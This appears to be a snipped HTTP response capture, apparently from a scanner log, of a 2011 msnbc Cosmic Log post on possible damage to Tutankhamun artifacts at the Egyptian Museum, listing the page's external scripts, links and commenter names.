Location: http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged?GT1=43001
Content-Type: text/html
Cache-Control: max-age=284
Date: Sun, 30 Jan 2011 16:43:35 GMT
Connection: close

<!DOCTYPE HTML>
<html lang="en"><head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="X-UA-Compatible" content="IE=8;IE=9" />
<title>Cosmic Log - Were Tut's t
...[SNIP]...
<link rel="alternate" type="application/rss+xml" title="RSS" href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author" />
<link class="cpk_remote" rel="stylesheet" type="text/css" href="http://yui.yahooapis.com/combo?2.8.0r4/build/button/assets/skins/sam/button.css&2.8.0r4/build/container/assets/skins/sam/container.css" />
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://yui.yahooapis.com/combo?2.8.1/build/utilities/utilities.js&2.8.1/build/button/button-min.js&2.8.1/build/container/container-min.js&2.8.1/build/cookie/cookie-min.js&2.8.1/build/selector/selector-min.js&2.8.1/build/event-delegate/event-delegate-min.js&2.8.1/build/json/json-min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.3/jquery.min.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/quicktags/v131.js?v=2"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_util/tiny_mce/tinymce_3_3_9_2/tiny_mce.js"></script>
<script class="cpk_remote" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_vine/js/pierre?v=2643&lib=jquery&addwidgets=zinger,wetbar"></script>
<link class="cpk_static" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/39f49614ef57bfa39918e852b69f13f139a7e311.css?v=23247" />
<script class="cpk_static" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/9d030b901f826a71aa88c354332b97d68143daaf.js?v=23247"></script>
<link class="cpk_dynamic" rel="stylesheet" type="text/css" href="http://www.polls.newsvine.com/_static/css/a0982aa7c85927affca00c12d01c5d62d5629caf.css?v=23247" />
<script class="cpk_dynamic" language="javascript" type="text/javascript" src="http://www.polls.newsvine.com/_static/js/be62a51c8122dbfe2873a3381fba7856187fe888.js?v=23247"></script>
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/base.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/abstractmartinblog/style.css?v=23247" />
<link class="cpk_chrome" rel="stylesheet" type="text/css" href="http://lib.newsvine.com/chrome/cosmiclog/style.css?v=23247" />
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/cosmiclog/chrome.js?v=23247"></script>
<script class="cpk_chrome" language="javascript" type="text/javascript" src="http://lib.newsvine.com/chrome/abstractmartinblog/chrome.js?v=23247"></script>
...[SNIP]...
<div class="pokeDiv"><img id="poke" src="http://log.newsvine.com/poke.gif?x=0|26&amp;get=c5943271&amp;rand=1422531462&amp;do=msnbc.redacted&amp;rf=http%3A%2F%2Fwww.redacted%2F&amp;ad=78:9:80;44::;77:27:108;58:58:178;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;78:9:80;86:86:270;87:87:209;84::" alt="" width="0" height="0" /></div>
...[SNIP]...
<li class="i1 hotmail"><a href="http://www.hotmail.com">Hotmail</a>
...[SNIP]...
<li class="i2 more">
               <a href="http://www.hotmail.com">More</a>
...[SNIP]...
<li class="i7"><a href="http://www.delish.com/">Delish</a>
...[SNIP]...
<li class="i9"><a href="http://msn.whitepages.com/">White Pages</a>
...[SNIP]...
<li class="i14"><a href="http://www.bing.com/shopping?FORM=SHOPH2">Shopping</a>
...[SNIP]...
<li class="i18"><a href="https://secure.opinionlab.com/ccc01/o.asp?ID=WpkpVtTB" target="_blank">Feedback</a>
...[SNIP]...
<li class="i19"><a href="http://www.bing.com/maps/default.aspx?FORM=MSNNAV">Maps &amp; Directions</a>
...[SNIP]...
<li class="i20"><a href="http://www.bing.com/travel/?cid=msn_nav_more&amp;FORM=MSNNAV ">Travel</a>
...[SNIP]...
<li id="bing" class="i3 bing"><a href="http://www.bing.com"><span>
...[SNIP]...
<li class="i2 show-today"><a href="http://today.msnbc.com/">TODAY</a></li>
           <li class="i3 show-nightly"><a href="http://nightly.msnbc.com/">Nightly News</a>
...[SNIP]...
<li class="i4 show-mtp"><a href="http://mtp.msnbc.com/">Meet the Press</a>
...[SNIP]...
<li class="i5 show-dateline"><a href="http://dateline.msnbc.com/">Dateline</a>
...[SNIP]...
<li class="i6 show-maddow"><a href="http://rachel.msnbc.com/">Maddow</a>
...[SNIP]...
<li class="i8 show-hardball"><a href="http://hardball.msnbc.com/">Hardball</a>
...[SNIP]...
<li class="i9 show-msnbc"><a href="http://tv.msnbc.com/">msnbc tv</a>
...[SNIP]...
<li class="i10 site-newsvine"><a href="http://www.newsvine.com/">Newsvine</a>
...[SNIP]...
<li class="i11 site-everyblock"><a href="http://www.everyblock.com/">EveryBlock</a>
...[SNIP]...
</a>, or connect via <a href="http://www.facebook.com/cosmiclog" target="_blank">Facebook</a> or <a href="http://twitter.com/b0yle" target="_blank">Twitter</a>
...[SNIP]...
<li class="email_subscribe_option"><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-email.png" width="19" height="18" alt="Icons Email"> Receive e-mail updates</a>
...[SNIP]...
</div><a href="https://www.newsvine.com/_nv/accounts/msnbc/emailAlerts?affiliate=msnbc.redacted">change this</a>
...[SNIP]...
<div class="spinner hide"><img src="http://www.polls.newsvine.com/_vine/images/__/spinner.gif" width="16" height="16" alt="Loading" /> Saving...</div>
...[SNIP]...
<a href="http://cosmiclog.msnbc.redacted/_feeds/rss2/author"><img src="http://lib.newsvine.com/chrome/abstractmartinblog/images/icons-feed.png" width="18" height="18" alt="Icons Feed"> Subscribe to RSS</a>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=button_count&amp;show_faces=false&amp;width=90&amp;action=like&amp;colorscheme=light&amp;href=http://www.facebook.com/CosmicLog" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:90px; height:20px"></iframe>
...[SNIP]...
<!-- SiteCatalyst code version: G.9. Copyright 1997-2004 Omniture, Inc. More info available at http://www.omniture.com -->
<script src="http://www.polls.newsvine.com/_vine/js/msnbc/std.js?v=23247"></script>
...[SNIP]...
</script><script src="http://www.polls.newsvine.com/_vine/js/msnbc/s_code.js?v=23247"></script>
...[SNIP]...
<p>Margaret Maitland, an Egyptologist at Oxford University in England, <a target="_blank" href="http://www.eloquentpeasant.com/2011/01/29/statues-of-tutankhamun-damagedstolen-from-the-egyptian-museum/">matched up shots of&nbsp;the&nbsp;damage</a>
...[SNIP]...
<div id="vine-inlinePhoto__5950504" data-contentId="5950504" class="inlinePhoto photo_landscape photo_align_block user_inline_photo" style="width:600px;"><img id="boyle/5950504.jpg" src="http://www.polls.newsvine.com/_vine/images/users/600/boyle/5950504.jpg" width="600" height="386" alt="" /><p class="photo_credit">
...[SNIP]...
<p>The footage&nbsp;suggests that a third statuette of a standing Tut was broken off right at the feet. Check out Maitland's&nbsp;<a target="_blank" href="http://www.eloquentpeasant.com/2011/01/29/statues-of-tutankhamun-damagedstolen-from-the-egyptian-museum/">blog posting at the Eloquent Peasant</a>
...[SNIP]...
s headquarters,&nbsp;virtually next door, and at last report that building was still in danger of collapse. "What scares me is that if this building is destroyed, it will fall over the museum," Hawass <a target="_blank" href="http://www.google.com/hostednews/canadianpress/article/ALeqM5jltiUv0XPnEnWrQOQKh5QQTLbFjg?docId=5793584">told reporters</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
urgent call on the Al Arabiya television channel: "I am calling on the Egyptian army to head instantly to the Egyptian Museum. There is a fire right next to it in the party headquarters," he said in a <a target="_blank" href="http://www.reuters.com/article/2011/01/28/us-egypt-museum-idUSTRE70R7K820110128">report relayed by Reuters</a>
...[SNIP]...
<p itxtvisited="1">"I felt deeply sorry today when I came this morning to the Egyptian Museum and found that some had tried to raid the museum by force last night,"&nbsp;<a href="http://af.reuters.com/article/egyptNews/idAFLDE70S0BG20110129">Reuters quoted him as saying</a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</strong> <a target="_blank" href="http://www.dailymail.co.uk/news/article-1351826/Egypt-protests-Looters-bid-steal-King-Tuts-treasures.html">The Daily Mail </a>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
</a> community by clicking the "like" button on <a target="_blank" href="http://www.facebook.com/cosmiclog">our Facebook page</a> or by following msnbc.com science editor Alan Boyle as <a href="http://twitter.com/b0yle">b0yle on Twitter</a>. To learn more about Alan Boyle's book about Pluto and the search for planets, check out the <a target="_blank" href="http://www.thecaseforpluto.com/">website for "The Case for Pluto."</a>
...[SNIP]...
<div class="tweetbutton"><a href="http://twitter.com/share" class="twitter-share-button" data-count="horizontal" data-via="cosmiclog" data-related="breakingnews:The fastest breaking news on Twitter." data-url="http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged" data-Text="Were Tut's treasures damaged?">Tweet</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
<div class="vine-p vine_data_M2_LayoutPrinter vine_data_M2_FlexiblePrinter p-widgets_FBLike">
<iframe src="http://www.facebook.com/plugins/like.php?layout=standard&amp;show_faces=true&amp;width=480&amp;action=recommend&amp;colorscheme=light&amp;href=http://cosmiclog.msnbc.redacted/_news/2011/01/28/5943271-were-tuts-treasures-damaged" scrolling="no" frameborder="0" allowTransparency="true" style="border:none; overflow:hidden; width:480px; height:70px"></iframe>
...[SNIP]...
<a href="#star2" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ToastyMcGrath.newsvine.com/">Toasty McGrath</a>
...[SNIP]...
<a href="#star3" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://bspurloc.newsvine.com/">bspurloc</a>
...[SNIP]...
<a href="#star4" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://crappygovernment.newsvine.com/">Ben-1671313</a>
...[SNIP]...
<div class="normal"><a href="http://cristofocristofo.newsvine.com/">Teacher Trish</a>
...[SNIP]...
<a href="#star5" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Kathy-1571680.newsvine.com/">Kathy-1571680</a>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
<a href="#star6" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://sanescience.newsvine.com/">Sanescience</a>
...[SNIP]...
<div class="normal"><a href="http://freedman1-1.newsvine.com/">freedman1</a>
...[SNIP]...
<div class="normal"><a href="http://kevpatok.newsvine.com/">kpokeefe</a>
...[SNIP]...
<div class="normal"><a href="http://Elisa2999017.newsvine.com/">Elisa-2999017</a>
...[SNIP]...
<a href="#star7" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://LBowman1.newsvine.com/">LBowman1</a>
...[SNIP]...
<div class="normal"><a href="http://drewcabrera.newsvine.com/">DrewMeister</a>
...[SNIP]...
<a href="#star8" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://HEHummel.newsvine.com/">H.E. Hummel</a>
...[SNIP]...
<div class="normal"><a href="http://EastRowanDad.newsvine.com/">EastRowanDad</a>
...[SNIP]...
<a href="#star9" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Rebecca2999066.newsvine.com/">Rebecca-2999066</a>
...[SNIP]...
<a href="#star10" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://cc-f.newsvine.com/">LameStory</a>
...[SNIP]...
<a href="#star11" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://mkilsley.newsvine.com/">SecondSight</a>
...[SNIP]...
<div class="normal"><a href="http://AlfromNorCal.newsvine.com/">Al from NorCal</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://BlackLabsDad.newsvine.com/">BlackLabsDad</a>
...[SNIP]...
<div class="normal"><a href="http://Scott2632503.newsvine.com/">Scott-2632503</a>
...[SNIP]...
<div class="normal"><a href="http://hernan-ferrea.newsvine.com/">Martin33189</a>
...[SNIP]...
<div class="normal"><a href="http://geoduck2999500.newsvine.com/">geoduck-2999500</a>
...[SNIP]...
<div class="normal"><a href="http://bob-randall-1218482.newsvine.com/">Bob Randall-1218482</a>
...[SNIP]...
<div class="normal"><a href="http://justiceforall2038290.newsvine.com/">justiceforall-2038290</a>
...[SNIP]...
<div class="normal"><a href="http://snapsean.newsvine.com/">snapsean</a>
...[SNIP]...
<div class="normal"><a href="http://cc-f.newsvine.com/">LameStory</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<a href="#star12" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://johntitor1.newsvine.com/">John Titor</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star13" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://MahmoodAbidizajahd.newsvine.com/">Mahmood Abidizajahd</a><span class="collapseDiv"><img src="http://www.polls.newsvine.com/_vine/images/_/b_expandcomment.gif" width="9" height="9" alt="Expand Comment" title="Expand Comment" /> Comment collapsed by the community</span>
...[SNIP]...
<a href="#star14" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Melissa2673591.newsvine.com/">Melissa-2673591</a>
...[SNIP]...
<a href="#star15" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Lamortdelioncourt.newsvine.com/">lamort DeLioncourt</a>
...[SNIP]...
<a href="#star16" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Smarterthanyou2999028.newsvine.com/">Smarter than you-2999028</a><span class="collapseDiv"><img src="http://www.polls.newsvine.com/_vine/images/_/b_expandcomment.gif" width="9" height="9" alt="Expand Comment" title="Expand Comment" /> Comment collapsed by the community</span>
...[SNIP]...
<div class="normal"><a href="http://lbjack.newsvine.com/">lbjack</a>
...[SNIP]...
<div class="normal"><a href="http://GenericName.newsvine.com/">GenericName</a>
...[SNIP]...
<div class="normal"><a href="http://MintyFreshness.newsvine.com/">Minty Freshness</a>
...[SNIP]...
<div class="normal"><a href="http://justiceforall2038290.newsvine.com/">justiceforall-2038290</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star17" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://gregb2.newsvine.com/">GregB-2059108</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star18" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://CRStardust.newsvine.com/">Stardust-649419</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://AndieSanDiegoCA.newsvine.com/">Andie,San Diego, CA</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star19" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://demmcc.newsvine.com/">dave-1186103</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star20" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://Benjamin35.newsvine.com/">Benjamin-358843</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://optomyst-1.newsvine.com/">Optomyst</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://DaveKnightstable.newsvine.com/">Dave Knightstable</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star21" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://greg-51.newsvine.com/">99octane</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<a href="#star22" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://wtfever.newsvine.com/">ZillaKilla</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="normal"><a href="http://threeboysmom.newsvine.com/">MG from IL</a>
...[SNIP]...
<div class="normal"><a href="http://LynnGrant.newsvine.com/">Lynn Grant</a>
...[SNIP]...
<div class="normal"><a href="http://MarySusan.newsvine.com/">just wonderin</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://mtg303.newsvine.com/">Mtg303</a>
...[SNIP]...
<div class="normal"><a href="http://ra-rishikavi-raghudas.newsvine.com/">The Poet</a>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
<div class="normal"><a href="http://justiceforall2038290.newsvine.com/">justiceforall-2038290</a>
...[SNIP]...
<div class="normal"><a href="http://cc-f.newsvine.com/">LameStory</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<div class="normal"><a href="http://angie1939907.newsvine.com/">angie-1939907</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://piotrpanne.newsvine.com/">cheetah-822547</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="normal"><a href="http://RJohnson1998028.newsvine.com/">R Johnson-1998028</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://Darthdon.newsvine.com/">Darthdon</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star23" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://DoubleG2996677.newsvine.com/">DoubleG-2996677</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://cindy2999049.newsvine.com/">cindy-2999049</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://morphine-carnival.newsvine.com/">~m~(O)~r~phine Carnival</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://lola3.newsvine.com/">lola3</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://declan01.newsvine.com/">dman-353357</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://BlackshoesBlacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star24" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://trobertz.newsvine.com/">scales67</a>
...[SNIP]...
<p><a href="http://blackshoesblacksocks.newsvine.com/">BlackshoesBlacksocks</a>
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://KrasnaLudec.newsvine.com/">Krasna Ludec</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star25" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://AJPAGE.newsvine.com/">Page CN</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<a href="#star26" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://selmor101.newsvine.com/">Roger-535160</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Alan1380274.newsvine.com/">Alan-1380274</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://Davethedoubter.newsvine.com/">Dave the doubter</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://mar2892158.newsvine.com/">mar-2892158</a>
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="normal"><a href="http://stspecialk.newsvine.com/">stspecialk</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://morriswise2276198.newsvine.com/">morris wise-2276198</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://n2nh2000.newsvine.com/">JohnS-WRJ-VT</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
<div class="normal"><a href="http://henrybadgood.newsvine.com/">henrybadgood</a>
...[SNIP]...
</div><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /><span class="commentdate">
...[SNIP]...
<div class="normal"><a href="http://jtjsrch.newsvine.com/">John-334951</a>
...[SNIP]...
<div class="clearfix"><img class="replybutton" src="http://www.polls.newsvine.com/_vine/images/_/b_reply_mini.gif" width="35" height="12" alt="Reply" /></div>
...[SNIP]...
</div><script src="http://content.pulse360.com/42EBFC62-1F4E-11E0-AB70-41F5E4064C68" type="text/javascript"></script>
...[SNIP]...
</div><script src="http://content.pulse360.com/517F9430-C0FA-11DF-831B-94A93FF5047F" type="text/javascript"></script>
...[SNIP]...
<a href="#star27" class="noborder star"><img src="http://www.polls.newsvine.com/_vine/images/_/b_star.gif" width="16" height="16" alt="" title="Jump To Next Highly Rated Comment" /></a><a href="http://ALLY2998591.newsvine.com/">ALLY-2998591</a>
...[SNIP]...
